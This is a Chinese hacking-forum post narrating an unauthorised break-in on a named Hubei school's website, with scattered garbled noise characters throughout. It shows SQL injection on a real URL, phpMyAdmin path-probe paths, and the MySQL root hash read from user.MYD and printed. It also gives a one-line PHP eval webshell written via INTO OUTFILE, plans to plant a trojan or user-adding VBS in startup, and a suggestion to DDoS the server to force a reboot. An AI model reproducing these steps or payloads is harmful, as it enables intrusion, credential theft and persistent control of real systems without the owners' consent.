友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！



9 `& B- @9 ]3 b- |4 l/ e常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

8 X' G/ T. \9 H! v8 z那么想可以直接写入shell ，getshell有几个条件：
- s- W5 m% e; m$ O1 G! ^

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

9 w" W1 G  n5 d试着爆绝对路径：
/ q  Q- `  S3 P* G+ |8 `( r* G, }1./phpMyAdmin/index.php?lang[]=1  
% J7 O. `+ @9 ?8 \4 A, n, Z/ _2./phpMyAdmin/phpinfo.php  
3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
  y. f% |6 `, s4 }% X- F/ N7./phpmyadmin/libraries/mcrypt.lib.php   
* a$ i) X/ z% N/ _8./phpmyadmin/libraries/export/xls.php  

均不行...........................
. H5 r+ o# L( a% ]+ X, b
御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
' V: B8 ?; ^4 E% K8 o
权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

; y6 h; x, `. o/ }敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
) v9 K4 S) w! x& L" @
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：
/ ]- ~7 s1 X$ }; S$ Y
" p1 N* v5 h& b, o17---- r(0072)
18---- o(006f)
19---- o(006f)
20---- t(0074)
21---- *(002a)
22---- 8(0038)
- G% ~+ a0 m8 q23---- 2(0032)
24---- E(0045)
25---- 1(0031)
26---- C(0043)
27---- 5(0035)
0 A, Z: P1 k$ \( `28---- 8(0038)
29---- 2(0032)
30---- 8(0038)
31---- A(0041)
32---- 9(0039)
33---- B(0042)
34---- 5(0035)
% A" I3 n- l8 D) L7 S0 i, `35---- 4(0034)
% b2 Z5 \9 p: o, i36---- 8(0038)
; ~) e) b9 w+ V2 l37---- 6(0036)
38---- 4(0034)
39---- 9(0039)
. v+ i7 q8 }" ]+ d40---- 1(0031)
2 X3 m6 W$ t1 k' X* t/ \41---- 1(0031)
) }+ i$ d1 ^" W42---- 5(0035)
43---- 3(0033)
7 H4 R% k$ g. G/ e44---- 5(0035)
45---- 9(0039)
+ J! H' z& ?/ I46---- 8(0038)
" ?( h1 V+ |9 k) U" |) X47---- F(0046)
$ ]# J! [, X6 z! [% A48---- F(0046)
) \; s. |3 x7 k2 \) p( X/ c49---- 4(0034)
; _! C" e1 B1 c/ U50---- F(0046)
! w0 U% s9 S- Y51---- 0(0030)
4 Z% L3 Y" |3 M: Q52---- 3(0033)
! K; O( }+ m, j4 f$ `) k53---- 2(0032)
54---- A(0041)
7 d+ _% a6 }: v55---- 4(0034)
56---- A(0041)
57---- B(0042)
+ r7 t1 f4 h. R, }, Z; V58---- *(0044)
59---- *(0035)
60---- *(0041)
61---- *0032)
# _3 R# h* }2 n- _; b' J* ~9 B
解密后成功登陆phpmyamin
7 ~8 X; m% R% Z# u. e- a- \                          
- D- X. c9 l: ^8 u
% t' m: f0 I3 u1 S9 ?                             

找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

4 \9 D8 C: Y* v3 W成功执行，拿下shell，菜刀连接：
+ a3 |: z" [' k+ q; }" {
, J. `0 Y6 V9 G* B3 s2 j6 ]- e服务器不支持asp,aspx,php提权无果...................

: ~5 B8 H# `7 @6 l: ^但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

别名     administrators
8 p; P6 p* S4 x# d* n注释     管理员对计算机/域有不受限制的完全访问权

成员

( Z/ I  I4 R0 q* l5 }9 t+ h. L

-------------------------------------------------------------------------------
; F+ P$ ?- L% s7 ]& L7 Y" yadmin
Administrator
1 _; a# U1 @1 K8 K" H% \slipper$
sqluser
: E. V1 ]( _, e$ \2 x5 s# c& H( Y8 f. X) m( u命令成功完成。

9 e2 C5 j4 @8 ^# V1 o5 T4 s服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

: O3 }  V/ u; [+ p( A% vddos服务器重启，不然就只能坐等服务器重启了...............................
& Y0 @2 |6 L  H- f! g
      

1 r; D% R, f3 |" {7 ?

angel